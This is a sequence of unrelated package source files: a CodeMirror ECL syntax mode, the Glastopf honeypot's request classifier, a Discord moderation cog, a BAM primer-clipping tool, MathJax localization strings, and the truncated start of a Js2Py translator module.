var keyword = words("abs acos allnodes ascii asin asstring atan atan2 ave case choose choosen choosesets clustersize combine correlation cos cosh count covariance cron dataset dedup define denormalize distribute distributed distribution ebcdic enth error evaluate event eventextra eventname exists exp failcode failmessage fetch fromunicode getisvalid global graph group hash hash32 hash64 hashcrc hashmd5 having if index intformat isvalid iterate join keyunicode length library limit ln local log loop map matched matchlength matchposition matchtext matchunicode max merge mergejoin min nolocal nonempty normalize parse pipe power preload process project pull random range rank ranked realformat recordof regexfind regexreplace regroup rejected rollup round roundup row rowdiff sample set sin sinh sizeof soapcall sort sorted sqrt stepped stored sum table tan tanh thisnode topn tounicode transfer trim truncate typeof ungroup unicodeorder variance which workunit xmldecode xmlencode xmltext xmlunicode");
var variable = words("apply assert build buildindex evaluate fail keydiff keypatch loadxml nothor notify output parallel sequential soapcall wait");
var variable_2 = words("__compressed__ all and any as atmost before beginc++ best between case const counter csv descend encrypt end endc++ endmacro except exclusive expire export extend false few first flat from full function group header heading hole ifblock import in interface joined keep keyed last left limit load local locale lookup macro many maxcount maxlength min skew module named nocase noroot noscan nosort not of only opt or outer overwrite packed partition penalty physicallength pipe quote record relationship repeat return right scan self separator service shared skew skip sql store terminator thor threshold token transform trim true type unicodeorder unsorted validate virtual whole wild within xml xpath");
var variable_3 = words("ascii big_endian boolean data decimal ebcdic integer pattern qstring real record rule set of string token udecimal unicode unsigned varstring varunicode");
var builtin = words("checkpoint deprecated failcode failmessage failure global independent onwarning persist priority recovery stored success wait when");
var blockKeywords = words("catch class do else finally for if switch try while");
var atoms = words("true false null");
var hooks = {"#": metaHook};
var multiLineStrings;
var isOperatorChar = /[+\-*&%=<>!?|\/]/;
var curPunc;
function tokenBase(stream, state) {
var ch = stream.next();
if (hooks[ch]) {
var result = hooks[ch](stream, state);
if (result !== false) return result;
}
if (ch == '"' || ch == "'") {
state.tokenize = tokenString(ch);
return state.tokenize(stream, state);
}
if (/[\[\]{}\(\),;\:\.]/.test(ch)) {
curPunc = ch;
return null;
}
if (/\d/.test(ch)) {
stream.eatWhile(/[\w\.]/);
return "number";
}
if (ch == "/") {
if (stream.eat("*")) {
state.tokenize = tokenComment;
return tokenComment(stream, state);
}
if (stream.eat("/")) {
stream.skipToEnd();
return "comment";
}
}
if (isOperatorChar.test(ch)) {
stream.eatWhile(isOperatorChar);
return "operator";
}
stream.eatWhile(/[\w\$_]/);
var cur = stream.current().toLowerCase();
if (keyword.propertyIsEnumerable(cur)) {
if (blockKeywords.propertyIsEnumerable(cur)) curPunc = "newstatement";
return "keyword";
} else if (variable.propertyIsEnumerable(cur)) {
if (blockKeywords.propertyIsEnumerable(cur)) curPunc = "newstatement";
return "variable";
} else if (variable_2.propertyIsEnumerable(cur)) {
if (blockKeywords.propertyIsEnumerable(cur)) curPunc = "newstatement";
return "variable-2";
} else if (variable_3.propertyIsEnumerable(cur)) {
if (blockKeywords.propertyIsEnumerable(cur)) curPunc = "newstatement";
return "variable-3";
} else if (builtin.propertyIsEnumerable(cur)) {
if (blockKeywords.propertyIsEnumerable(cur)) curPunc = "newstatement";
return "builtin";
} else { //Data types are of from KEYWORD##
var i = cur.length - 1;
while(i >= 0 && (!isNaN(cur[i]) || cur[i] == '_'))
--i;
if (i > 0) {
var cur2 = cur.substr(0, i + 1);
if (variable_3.propertyIsEnumerable(cur2)) {
if (blockKeywords.propertyIsEnumerable(cur2)) curPunc = "newstatement";
return "variable-3";
}
}
}
if (atoms.propertyIsEnumerable(cur)) return "atom";
return null;
}
function tokenString(quote) {
return function(stream, state) {
var escaped = false, next, end = false;
while ((next = stream.next()) != null) {
if (next == quote && !escaped) {end = true; break;}
escaped = !escaped && next == "\\";
}
if (end || !(escaped || multiLineStrings))
state.tokenize = tokenBase;
return "string";
};
}
function tokenComment(stream, state) {
var maybeEnd = false, ch;
while (ch = stream.next()) {
if (ch == "/" && maybeEnd) {
state.tokenize = tokenBase;
break;
}
maybeEnd = (ch == "*");
}
return "comment";
}
function Context(indented, column, type, align, prev) {
this.indented = indented;
this.column = column;
this.type = type;
this.align = align;
this.prev = prev;
}
function pushContext(state, col, type) {
return state.context = new Context(state.indented, col, type, null, state.context);
}
function popContext(state) {
var t = state.context.type;
if (t == ")" || t == "]" || t == "}")
state.indented = state.context.indented;
return state.context = state.context.prev;
}
// Interface
return {
startState: function(basecolumn) {
return {
tokenize: null,
context: new Context((basecolumn || 0) - indentUnit, 0, "top", false),
indented: 0,
startOfLine: true
};
},
token: function(stream, state) {
var ctx = state.context;
if (stream.sol()) {
if (ctx.align == null) ctx.align = false;
state.indented = stream.indentation();
state.startOfLine = true;
}
if (stream.eatSpace()) return null;
curPunc = null;
var style = (state.tokenize || tokenBase)(stream, state);
if (style == "comment" || style == "meta") return style;
if (ctx.align == null) ctx.align = true;
if ((curPunc == ";" || curPunc == ":") && ctx.type == "statement") popContext(state);
else if (curPunc == "{") pushContext(state, stream.column(), "}");
else if (curPunc == "[") pushContext(state, stream.column(), "]");
else if (curPunc == "(") pushContext(state, stream.column(), ")");
else if (curPunc == "}") {
while (ctx.type == "statement") ctx = popContext(state);
if (ctx.type == "}") ctx = popContext(state);
while (ctx.type == "statement") ctx = popContext(state);
}
else if (curPunc == ctx.type) popContext(state);
else if (ctx.type == "}" || ctx.type == "top" || (ctx.type == "statement" && curPunc == "newstatement"))
pushContext(state, stream.column(), "statement");
state.startOfLine = false;
return style;
},
indent: function(state, textAfter) {
if (state.tokenize != tokenBase && state.tokenize != null) return 0;
var ctx = state.context, firstChar = textAfter && textAfter.charAt(0);
if (ctx.type == "statement" && firstChar == "}") ctx = ctx.prev;
var closing = firstChar == ctx.type;
if (ctx.type == "statement") return ctx.indented + (firstChar == "{" ? 0 : indentUnit);
else if (ctx.align) return ctx.column + (closing ? 0 : 1);
else return ctx.indented + (closing ? 0 : indentUnit);
},
electricChars: "{}"
};
});
CodeMirror.defineMIME("text/x-ecl", "ecl");
}); | PypiClean |
/Glastopf-3.1.2.tar.gz/Glastopf-3.1.2/glastopf/modules/classification/request.py |
import re
import os
import urlparse
import urllib2
from xml.dom.minidom import parse
import glastopf.modules.classification.sql as sql
package_directory = os.path.dirname(os.path.abspath(__file__))
class RequestPattern(object):
def __init__(self, pattern_id, string, description, module):
self.id = pattern_id
self.string = string
self.description = description
self.module = module
class Classifier(object):
# FIXME: Error handling for errors in the xml file
def __init__(self, data_dir=os.path.join(os.getcwd(), 'data')):
# TODO: check if file exists
#ugly but it works...
requests_file = os.path.join(package_directory, '../../requests.xml')
self.tree = parse(requests_file)
self.server_files_path = os.path.join(data_dir, 'server_files')
if not os.path.isdir(self.server_files_path):
os.mkdir(self.server_files_path, 0770)
self.sqli_c = sql.SQLiClassifier()
def get_patterns(self):
patterns = self.tree.getElementsByTagName("request")
return patterns
def getText(self, nodelist):
rc = []
for node in nodelist:
if node.nodeType == node.TEXT_NODE or node.nodeType == node.CDATA_SECTION_NODE:
rc.append(node.data)
break
return ''.join(rc)
def parse_pattern(self, pattern):
pattern_id = self.getText(pattern.getElementsByTagName("id")[0].childNodes)
pattern_string = self.getText(pattern.getElementsByTagName("patternString")[0].childNodes)
pattern_description = pattern.getElementsByTagName("patternDescription")[0].childNodes[0].data
pattern_module = pattern.getElementsByTagName("module")[0].childNodes[0].data
parsed_pattern = RequestPattern(pattern_id, pattern_string,
pattern_description, pattern_module)
return parsed_pattern
def select_pattern(self, matched_patterns):
# TODO: add some logic
matched_pattern = matched_patterns[0]
if len(matched_patterns) > 1:
if matched_patterns[0] == "unknown":
matched_pattern = matched_patterns[1]
else:
matched_pattern = matched_patterns[0]
return matched_pattern
def file_exists(self, http_request):
request_path = urlparse.urlparse(http_request.path).path
requested_file = request_path.lstrip('/')
if os.path.isfile(os.path.join(self.server_files_path, requested_file)):
return True
return False
def classify_request(self, http_request):
if self.file_exists(http_request):
return "file_server"
patterns = self.get_patterns()
matched_patterns = []
unquoted_url = urllib2.unquote(http_request.request_url)
# SQLi early exit
ret = self.sqli_c.classify(unquoted_url)
if ret['sqli']:
return "sqli"
for pattern in patterns:
match = None
parsed_pattern = self.parse_pattern(pattern)
re_pattern = re.compile(parsed_pattern.string, re.I)
#TODO: Rules for specific method. We should add a tag in the
# rule to identify which rule it applies.
# And some forms would send data in GET and POST methods.
if http_request.command == "GET":
match = re_pattern.search(unquoted_url)
elif http_request.command == "POST":
match = re_pattern.search(unquoted_url)
if match == 'unknown':
match = re_pattern.search(http_request.request_body)
elif http_request.command == "HEAD":
parsed_pattern.module = 'head'
match = True
elif http_request.command == "TRACE":
parsed_pattern.module = 'trace'
match = True
else:
parsed_pattern.module = 'unknown'
match = True
if match != None:
matched_patterns.append(parsed_pattern.module)
matched_pattern = self.select_pattern(matched_patterns)
return matched_pattern | PypiClean |
/Kr0nOs-3.4.1.tar.gz/Kr0nOs-3.4.1/kronbot/cogs/mod/mod.py | import asyncio
import logging
import re
from abc import ABC
from collections import defaultdict
from typing import List, Tuple
import discord
from kronbot.core import Config, commands, modlog
from kronbot.core.bot import Kron
from kronbot.core.i18n import Translator, cog_i18n
from kronbot.core.utils._internal_utils import send_to_owners_with_prefix_replaced
from .casetypes import CASETYPES
from .events import Events
from .kickban import KickBanMixin
from .mutes import MuteMixin
from .names import ModInfo
from .settings import ModSettings
from .slowmode import Slowmode
_ = T_ = Translator("Mod", __file__)
__version__ = "1.2.0"
class CompositeMetaClass(type(commands.Cog), type(ABC)):
"""
This allows the metaclass used for proper type detection to
coexist with discord.py's metaclass
"""
pass
@cog_i18n(_)
class Mod(
ModSettings,
Events,
KickBanMixin,
MuteMixin,
ModInfo,
Slowmode,
commands.Cog,
metaclass=CompositeMetaClass,
):
"""Moderation tools."""
default_global_settings = {"version": ""}
default_guild_settings = {
"ban_mention_spam": False,
"delete_repeats": -1,
"ignored": False,
"respect_hierarchy": True,
"delete_delay": -1,
"reinvite_on_unban": False,
"current_tempbans": [],
"dm_on_kickban": False,
"default_days": 0,
}
default_channel_settings = {"ignored": False}
default_member_settings = {"past_nicks": [], "perms_cache": {}, "banned_until": False}
default_user_settings = {"past_names": []}
def __init__(self, bot: Kron):
super().__init__()
self.bot = bot
self.settings = Config.get_conf(self, 4961522000, force_registration=True)
self.settings.register_global(**self.default_global_settings)
self.settings.register_guild(**self.default_guild_settings)
self.settings.register_channel(**self.default_channel_settings)
self.settings.register_member(**self.default_member_settings)
self.settings.register_user(**self.default_user_settings)
self.cache: dict = {}
self.tban_expiry_task = self.bot.loop.create_task(self.check_tempban_expirations())
self.last_case: dict = defaultdict(dict)
self._ready = asyncio.Event()
async def initialize(self):
await self._maybe_update_config()
self._ready.set()
async def cog_before_invoke(self, ctx: commands.Context) -> None:
await self._ready.wait()
def cog_unload(self):
self.tban_expiry_task.cancel()
async def _maybe_update_config(self):
"""Maybe update `delete_delay` value set by Config prior to Mod 1.0.0."""
if not await self.settings.version():
guild_dict = await self.settings.all_guilds()
for guild_id, info in guild_dict.items():
delete_repeats = info.get("delete_repeats", False)
if delete_repeats:
val = 3
else:
val = -1
await self.settings.guild(discord.Object(id=guild_id)).delete_repeats.set(val)
await self.settings.version.set("1.0.0") # set version of last update
if await self.settings.version() < "1.1.0":
msg = _(
"Ignored guilds and channels have been moved. "
"Please use `[p]moveignoredchannels` if "
"you were previously using these functions."
)
self.bot.loop.create_task(send_to_owners_with_prefix_replaced(self.bot, msg))
await self.settings.version.set("1.1.0")
if await self.settings.version() < "1.2.0":
msg = _(
"Delete delay settings have been moved. "
"Please use `[p]movedeletedelay` if "
"you were previously using these functions."
)
self.bot.loop.create_task(send_to_owners_with_prefix_replaced(self.bot, msg))
await self.settings.version.set("1.2.0")
@commands.command()
@commands.is_owner()
async def moveignoredchannels(self, ctx: commands.Context) -> None:
"""Move ignored channels and servers to core"""
all_guilds = await self.settings.all_guilds()
all_channels = await self.settings.all_channels()
for guild_id, settings in all_guilds.items():
await self.bot._config.guild_from_id(guild_id).ignored.set(settings["ignored"])
await self.settings.guild_from_id(guild_id).ignored.clear()
for channel_id, settings in all_channels.items():
await self.bot._config.channel_from_id(channel_id).ignored.set(settings["ignored"])
await self.settings.channel_from_id(channel_id).clear()
await ctx.send(_("Ignored channels and guilds restored."))
@commands.command()
@commands.is_owner()
async def movedeletedelay(self, ctx: commands.Context) -> None:
"""
Move deletedelay settings to core
"""
all_guilds = await self.settings.all_guilds()
for guild_id, settings in all_guilds.items():
await self.bot._config.guild_from_id(guild_id).delete_delay.set(
settings["delete_delay"]
)
await self.settings.guild_from_id(guild_id).delete_delay.clear()
await ctx.send(_("Delete delay settings restored.")) | PypiClean |
/Katana-0.1.1.tar.gz/Katana-0.1.1/katana/clipper.py | #TODO: elaborate module doc
#TODO: see TODO.rst
#TODO: Add to PyPI
## Copyright 2014 Bioinformatics Core, University of Michigan
##
## Licensed under the Apache License, Version 2.0 (the "License");
## you may not use this file except in compliance with the License.
## You may obtain a copy of the License at
##
## http://www.apache.org/licenses/LICENSE-2.0
##
## Unless required by applicable law or agreed to in writing, software
## distributed under the License is distributed on an "AS IS" BASIS,
## WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
## See the License for the specific language governing permissions and
## limitations under the License.
from __future__ import print_function, absolute_import, division
import argparse
import csv
from datetime import datetime
import resource
import sys
import time
import traceback
import pysam
import katana
import katana.cigar as cigar
import katana.readhandler as readhandler
from katana.util import KatanaException, PrimerStats, PrimerStatsDumper, \
PrimerPair, Read, ReadTransformation
__version__ = katana.__version__
DESCRIPTION=\
'''Match each alignment in input BAM to primer, softclipping the primer region.
Katana matches each read to its corresponding primer pair based on start
position of the read. Katana then soft-clips the primer region from the edge of
the read sequence, rescuing the signal of true variants measured by overlapping
amplicons. The output is conceptually similar to hard-clipping the primers from
the original FASTQ reads based on sequence identity but with the advantage that
retaining the primers during alignment improves alignment quality.
'''
class _KatanaUsageError(Exception):
"""Raised for malformed command or invalid arguments."""
def __init__(self, msg, *args):
super(_KatanaUsageError, self).__init__(msg, *args)
class _KatanaArgumentParser(argparse.ArgumentParser):
"""Argument parser that raises UsageError instead of exiting."""
#pylint: disable=too-few-public-methods
def error(self, message):
'''Suppress default exit behavior'''
raise _KatanaUsageError(message)
#TODO: make this a logger object that writes to file and console and
# supports debug and info calls
def _log(msg_format, *args):
timestamp = datetime.now().strftime('%Y/%m/%d %H:%M:%S')
try:
print("{}|{}".format(timestamp, msg_format).format(*args),
file=sys.stderr)
except IndexError:
print(args)
sys.stderr.flush()
def _filter_builder(read_transformation):
filters = []
if read_transformation.is_unmapped:
filters.append("UNMAPPED_ALIGNMENT")
else:
if read_transformation.primer_pair.is_unmatched:
filters.append("UNMATCHED_PRIMER_PAIR")
if not read_transformation.is_cigar_valid:
filters.append("INVALID_CIGAR")
return filters
#TODO: refactor to expedite testing (e.g. clipped_cigar_provider,
# cached_clipped_cigar_provider)
def _build_read_transformations(read_iter, filter_builder):
read_transformations = {}
read_count = 0
cigar_cache={}
for read in read_iter:
try:
read_count += 1
primer_pair = PrimerPair.get_primer_pair(read)
key = (primer_pair, read.reference_start, read.cigarstring)
if not cigar_cache.get(key):
old_cigar = cigar.cigar_factory(read)
new_cigar = primer_pair.softclip_primers(old_cigar)
cigar_cache[key] = new_cigar
new_cigar = cigar_cache[key]
transform = ReadTransformation(read,
primer_pair,
new_cigar,
filter_builder)
read_transformations[read.key] = transform
except Exception as exception:
msg = "Problem with read {} [line {}] and primer pair {}: {}"
raise KatanaException(msg.format(read.query_name,
read_count,
primer_pair.target_id,
exception))
_log("Built transforms for [{}] alignments", read_count)
return read_transformations
def _handle_reads(read_handlers, read_iter, read_transformations):
for handler in read_handlers:
handler.begin()
for read in read_iter:
read_transformation = read_transformations[read.key]
mate_transformation = read_transformations.get(read.mate_key,
ReadTransformation.NULL)
try:
for handler in read_handlers:
handler.handle(read, read_transformation, mate_transformation)
except StopIteration:
pass
for handler in read_handlers:
handler.end()
def _initialize_primer_pairs(base_reader):
dict_reader = csv.DictReader(base_reader, delimiter='\t')
for row in dict_reader:
sense_start = int(row["Sense Start"]) - 1
sense_end = sense_start + len(row["Sense Sequence"])
antisense_start = int(row["Antisense Start"])
antisense_end = antisense_start - len(row["Antisense Sequence"])
PrimerPair(row["Customer TargetID"],
"chr" + row["Chr"], #TODO: this prefix seems hackish?
(sense_start, sense_end),
(antisense_end, antisense_start))
def _build_handlers(input_bam_filename,
output_bam_filename,
include_unmatched_reads):
stats = readhandler.StatsHandler(PrimerStats(),
PrimerStatsDumper(log_method=_log))
exclude = readhandler.ExcludeNonMatchedReadHandler(log_method=_log)
tag = readhandler.AddTagsReadHandler()
transform = readhandler.TransformReadHandler()
write = readhandler.WriteReadHandler(input_bam_filename,
output_bam_filename,
log_method=_log)
handlers = [stats, tag, transform, exclude, write]
if include_unmatched_reads:
handlers.remove(exclude)
return handlers
def _parse_command_line_args(arguments):
parser = _KatanaArgumentParser( \
formatter_class=argparse.RawTextHelpFormatter,
usage="katana primer_manifest input_bam output_bam",
description=(DESCRIPTION))
parser.add_argument("-V",
"--version",
action='version',
version=__version__)
parser.add_argument('primer_manifest',
help="path to primer manifest (tab-separated text)")
parser.add_argument('input_bam',
help="path to input BAM")
parser.add_argument('output_bam',
help="path to output BAM")
parser.add_argument("--preserve_all_alignments",
action="store_true",
help=("Preserve all incoming alignments (even if they "
"are unmapped, cannot be matched with primers, "
"result in invalid CIGARs, etc.)"))
args = parser.parse_args(arguments)
return args
def _peak_memory():
peak_memory = resource.getrusage(resource.RUSAGE_SELF).ru_maxrss
peak_memory_mb = peak_memory/1024
if sys.platform == 'darwin':
peak_memory_mb /= 1024
return int(peak_memory_mb)
#TODO: test
#TODO: check input files exist
def main(command_line_args=None):
'''Katana entry point.'''
try:
start_time = time.time()
if not command_line_args:
command_line_args = sys.argv
args = _parse_command_line_args(command_line_args[1:])
_log("Reading primer pairs from [{}]", args.primer_manifest)
with open(args.primer_manifest, "r") as input_primer_manifest:
_initialize_primer_pairs(input_primer_manifest)
_log("Read [{}] primer pairs", len(PrimerPair._all_primers))
input_bamfile = None
_log("Building transformations from BAM [{}]", args.input_bam)
#pylint: disable=no-member
input_bamfile = pysam.AlignmentFile(args.input_bam,"rb")
aligned_segment_iter = input_bamfile.fetch()
read_iter = Read.iter(aligned_segment_iter, input_bamfile)
read_transformations = _build_read_transformations(read_iter,
_filter_builder)
_log("Writing transformed alignments to [{}]", args.output_bam)
handlers = _build_handlers(args.input_bam,
args.output_bam,
args.preserve_all_alignments)
aligned_segment_iter = input_bamfile.fetch()
read_iter = Read.iter(aligned_segment_iter, input_bamfile)
_handle_reads(handlers, read_iter, read_transformations)
elapsed_time = int(time.time() - start_time)
_log("Done ({} seconds, {}mb peak memory)",
elapsed_time,
_peak_memory())
except _KatanaUsageError as usage_error:
message = "katana usage problem: {}".format(str(usage_error))
print(message, file=sys.stderr)
print("See 'katana --help'.", file=sys.stderr)
sys.exit(1)
except Exception: #pylint: disable=broad-except
_log("ERROR: An unexpected error occurred")
_log(traceback.format_exc())
exit(1)
finally:
try:
if input_bamfile:
input_bamfile.close()
except NameError:
pass
if __name__ == '__main__':
#import cProfile
#cProfile.run('main()')
main(sys.argv) | PypiClean |
/Mathics_Django-6.0.0-py3-none-any.whl/mathics_django/web/media/js/mathjax/localization/mk/FontWarnings.js | MathJax.Localization.addTranslation("mk","FontWarnings",{version:"2.7.9",isLoaded:true,strings:{webFont:"MathJax \u043A\u043E\u0440\u0438\u0441\u0442\u0438 \u043C\u0440\u0435\u0436\u043D\u0438 \u0444\u043E\u043D\u0442\u043E\u0432\u0438 \u0437\u0430 \u0438\u0441\u043F\u0438\u0441 \u043D\u0430 \u043C\u0430\u0442\u0435\u043C\u0430\u0442\u0438\u0447\u043A\u0438\u0442\u0435 \u0441\u043E\u0434\u0440\u0436\u0438\u043D\u0438 \u043D\u0430 \u0441\u0442\u0440\u0430\u043D\u0438\u0446\u0430\u0432\u0430. \u041D\u0430 \u0444\u043E\u043D\u0442\u043E\u0432\u0438\u0442\u0435 \u0438\u043C \u0442\u0440\u0435\u0431\u0430 \u0432\u0440\u0435\u043C\u0435 \u0434\u0430 \u0441\u0435 \u0432\u0447\u0438\u0442\u0430\u0430\u0442, \u043F\u0430 \u0442\u0430\u043A\u0430, \u0441\u0442\u0440\u0430\u043D\u0438\u0446\u0430\u0442\u0430 \u0431\u0438 \u0441\u0435 \u043F\u0440\u0438\u043A\u0430\u0436\u0430\u043B\u0430 \u043F\u043E\u0431\u0440\u0433\u0443 \u0434\u043E\u043A\u043E\u043B\u043A\u0443 \u0433\u0438 \u043F\u0440\u0435\u0437\u0435\u043C\u0435\u0442\u0435 \u043D\u0435\u043F\u043E\u0441\u0440\u0435\u0434\u043D\u043E \u0432\u043E \u0441\u0438\u0441\u0442\u0435\u043C\u0441\u043A\u0430\u0442\u0430 \u043F\u0430\u043F\u043A\u0430 \u0437\u0430 \u0444\u043E\u043D\u0442\u043E\u0432\u0438 \u043D\u0430 \u0432\u0430\u0448\u0438\u043E\u0442 \u0441\u043C\u0435\u0442\u0430\u0447.",imageFonts:"MathJax \u0433\u0438 \u043A\u043E\u0440\u0438\u0441\u0442\u0438 \u043D\u0435\u0433\u043E\u0432\u0438\u0442\u0435 \u0441\u043B\u0438\u043A\u043E\u0432\u043D\u0438 \u0444\u043E\u043D\u0442\u043E\u0432\u0438 \u043D\u0430\u043C\u0435\u0441\u0442\u043E \u043D\u0438\u0432\u043D\u0438\u0442\u0435 \u043C\u0435\u0441\u043D\u0438 \u0438\u043B\u0438 \u043C\u0440\u0435\u0436\u043D\u0438 \u043F\u0430\u043D\u0434\u0430\u043D\u0438. \u041E\u0432\u0438\u0435 \u0441\u0435 \u043F\u0440\u0438\u043A\u0430\u0436\u0443\u0432\u0430\u0430\u0442 \u043F\u043E\u0431\u0430\u0432\u043D\u043E \u0438 \u043C\u0430\u0442\u0435\u043C\u0430\u0442\u0438\u0447\u043A\u0438\u0442\u0435 \u0441\u043E\u0434\u0440\u0436\u0438\u043D\u0438 \u043C\u043E\u0436\u0435 \u0434\u0430 \u043D\u0435 \u0441\u0435 \u043F\u043E\u0433\u043E\u0434\u043D\u0438 \u0437\u0430 \u043F\u0435\u0447\u0430\u0442\u0435\u045A\u0435 \u043F\u0440\u0438 \u043F\u043E\u043B\u043D\u0430 \u0440\u0430\u0437\u0434\u0435\u043B\u0435\u043D\u0430 \u043C\u043E\u045C \u043D\u0430 \u0432\u0430\u0448\u0438\u043E\u0442 \u043F\u0435\u0447\u0430\u0442\u0430\u0440.",noFonts:"MathJax \u043D\u0435 \u043C\u043E\u0436\u0435 \u0434\u0430 \u0433\u043E \u043D\u0430\u0458\u0434\u0435 \u0444\u043E\u043D\u0442\u043E\u0442 \u0437\u0430 \u043F\u0440\u0438\u043A\u0430\u0437 \u043D\u0430 \u043C\u0430\u0442\u0435\u043C\u0430\u0442\u0438\u0447\u043A\u0438\u0442\u0435 \u0441\u043E\u0434\u0440\u0436\u0438\u043D\u0438, \u0430 \u043D\u0435 \u043C\u0443 \u0441\u0435 \u0434\u043E\u0441\u0442\u0430\u043F\u043D\u0438 \u043D\u0438 \u0441\u043B\u0438\u043A\u043E\u0432\u043D\u0438 \u0444\u043E\u043D\u0442\u043E\u0432\u0438, \u0448\u0442\u043E \u0437\u043D\u0430\u0447\u0438 \u0434\u0435\u043A\u0430 \u043C\u043E\u0440\u0430 \u0434\u0430 \u0441\u0435 \u043F\u043E\u0442\u043F\u0440\u0435 \u043D\u0430 \u043E\u043F\u0448\u0442\u043E\u043D\u0430\u043C\u0435\u043D\u0441\u043A\u0438\u0442\u0435 \u0443\u043D\u0438\u043A\u043E\u0434\u043D\u0438 \u0437\u043D\u0430\u0446\u0438, \u0441\u043E \u043D\u0430\u0434\u0435\u0436 \u0434\u0435\u043A\u0430 \u0432\u0430\u0448\u0438\u043E\u0442 \u043F\u0440\u0435\u043B\u0438\u0441\u0442\u0443\u0432\u0430\u0447 \u045C\u0435 \u043C\u043E\u0436\u0435 \u0434\u0430 \u0433\u0438 \u043F\u0440\u0438\u043A\u0430\u0436\u0435. \u041D\u0435\u043A\u043E\u0438 \u0437\u043D\u0430\u0446\u0438 \u043C\u043E\u0436\u0435 \u0434\u0430 \u043D\u0435 \u0441\u0435 \u043F\u0440\u0438\u043A\u0430\u0436\u0430\u0442 \u043A\u0430\u043A\u043E \u0448\u0442\u043E \u0442\u0440\u0435\u0431\u0430 \u0438\u043B\u0438 \u043F\u0430\u043A \u0432\u043E\u043E\u043F\u0448\u0442\u043E \u043D\u0435\u043C\u0430 \u0434\u0430 \u0441\u0435 \u043F\u043E\u0458\u0430\u0432\u0430\u0442.",webFonts:"\u041D\u0430\u0458\u0432\u0435\u045C\u0435\u0442\u043E \u0441\u043E\u0432\u0440\u0435\u043C\u0435\u043D\u0438 \u043F\u0440\u0435\u043B\u0438\u0441\u0442\u0443\u0432\u0430\u0447\u0438 \u043E\u0432\u043E\u0437\u043E\u043C\u043E\u0436\u0443\u0432\u0430\u0430\u0442 \u043F\u0440\u0435\u0437\u0435\u043C\u0430\u045A\u0435 \u043D\u0430 \u0444\u043E\u043D\u0442\u043E\u0432\u0438 \u043E\u0434 \u0441\u0435\u043C\u0440\u0435\u0436\u0458\u0435\u0442\u043E. \u041A\u0432\u0430\u043B\u0438\u0442\u0435\u0442\u043E\u0442 \u043D\u0430 \u0438\u0441\u043F\u0438\u0441\u043E\u0442 \u043D\u0430 \u0441\u0442\u0440\u0430\u043D\u0438\u0446\u0430\u0432\u0430 \u043C\u043E\u0436\u0435 \u0434\u0430 \u0441\u0435 \u043F\u043E\u0434\u043E\u0431\u0440\u0438 \u0430\u043A\u043E \u043F\u0440\u0435\u0437\u0435\u043C\u0435\u0442\u0435 \u043F\u043E\u043D\u043E\u0432\u0430 \u0432\u0435\u0440\u0437\u0438\u0458\u0430 \u043D\u0430 \u043F\u0440\u0435\u043B\u0438\u0441\u0442\u0443\u0432\u0430\u0447\u043E\u0442 (\u0438\u043B\u0438 \u043F\u0430\u043A \u0433\u043E \u0437\u0430\u043C\u0435\u043D\u0438\u0442\u0435 \u0441\u043E \u0434\u0440\u0443\u0433).",fonts:"MathJax \u043C\u043E\u0436\u0435 \u0434\u0430 \u0433\u0438 \u043A\u043E\u0440\u0438\u0441\u0442\u0438 [\u0444\u043E\u043D\u0442\u043E\u0432\u0438\u0442\u0435 \u043D\u0430 STIX](%1) \u0438\u043B\u0438 [\u043E\u043D\u0438\u0435 \u043D\u0430 MathJax TeX](%2). \u041F\u0440\u0435\u0437\u0435\u043C\u0435\u0442\u0435 \u0433\u0438 \u0438 \u0432\u043E\u0441\u043F\u043E\u0441\u0442\u0430\u0432\u0435\u0442\u0435 \u0433\u0438 \u0437\u0430 \u0434\u0430 \u0433\u043E \u043F\u043E\u0434\u043E\u0431\u0440\u0438\u0442\u0435 \u0438\u0441\u043F\u0438\u0441\u043E\u0442 \u043D\u0430 MathJax \u043D\u0430 \u0441\u0442\u0440\u0430\u043D\u0438\u0446\u0438\u0442\u0435.",STIXPage:"\u0421\u0442\u0440\u0430\u043D\u0438\u0446\u0430\u0432\u0430 \u0435 \u043F\u0440\u0435\u0434\u0432\u0438\u0434\u0435\u043D\u0430 \u0434\u0430 \u0433\u0438 \u043A\u043E\u0440\u0438\u0441\u0442\u0438 [\u0444\u043E\u043D\u0442\u043E\u0432\u0438\u0442\u0435 \u043D\u0430 STIX](%1). \u041F\u0440\u0435\u0437\u0435\u043C\u0435\u0442\u0435 \u0433\u0438 \u0438 \u0432\u043E\u0441\u043F\u043E\u0441\u0442\u0430\u0432\u0435\u0442\u0435 \u0433\u0438 \u0437\u0430 \u0434\u0430 \u0433\u043E \u043F\u043E\u0434\u043E\u0431\u0440\u0438\u0442\u0435 \u0438\u0441\u043F\u0438\u0441\u043E\u0442 \u043D\u0430 MathJax \u043D\u0430 \u0441\u0442\u0440\u0430\u043D\u0438\u0446\u0438\u0442\u0435.",TeXPage:"\u0421\u0442\u0440\u0430\u043D\u0438\u0446\u0430\u0432\u0430 \u0435 \u043F\u0440\u0435\u0434\u0432\u0438\u0434\u0435\u043D\u0430 \u0434\u0430 \u0433\u0438 \u043A\u043E\u0440\u0438\u0441\u0442\u0438 [\u0444\u043E\u043D\u0442\u043E\u0432\u0438\u0442\u0435 \u043D\u0430 MathJax TeX](%1). \u041F\u0440\u0435\u0437\u0435\u043C\u0435\u0442\u0435 \u0433\u0438 \u0438 \u0432\u043E\u0441\u043F\u043E\u0441\u0442\u0430\u0432\u0435\u0442\u0435 \u0433\u0438 \u0437\u0430 \u0434\u0430 \u0433\u043E \u043F\u043E\u0434\u043E\u0431\u0440\u0438\u0442\u0435 \u0438\u0441\u043F\u0438\u0441\u043E\u0442 \u043D\u0430 MathJax \u043D\u0430 \u0441\u0442\u0440\u0430\u043D\u0438\u0446\u0438\u0442\u0435."}});MathJax.Ajax.loadComplete("[MathJax]/localization/mk/FontWarnings.js"); | PypiClean |
/Js2Py-0.74.tar.gz/Js2Py-0.74/js2py/legecy_translators/functions.py | from __future__ import print_function
from jsparser import *
from utils import *
INLINE_NAME = 'PyJsLvalInline%d_'
INLINE_COUNT = 0
PRE_EXP_STARTS = {
'return', 'new', 'void', 'throw', 'typeof', 'in', 'instanceof'
}
PRE_ALLOWED = IDENTIFIER_PART.union({';', '{', '}', ']', ')', ':'})
INCREMENTS = {'++', '--'}
def reset_inline_count():
global INLINE_COUNT
INLINE_COUNT = 0
def remove_functions(source, all_inline=False):
"""removes functions and returns new source, and 2 dicts.
first dict with removed hoisted(global) functions and second with replaced inline functions"""
global INLINE_COUNT
inline = {}
hoisted = {}
n = 0
limit = len(source) - 9 # 8 is length of 'function'
res = ''
last = 0
while n < limit:
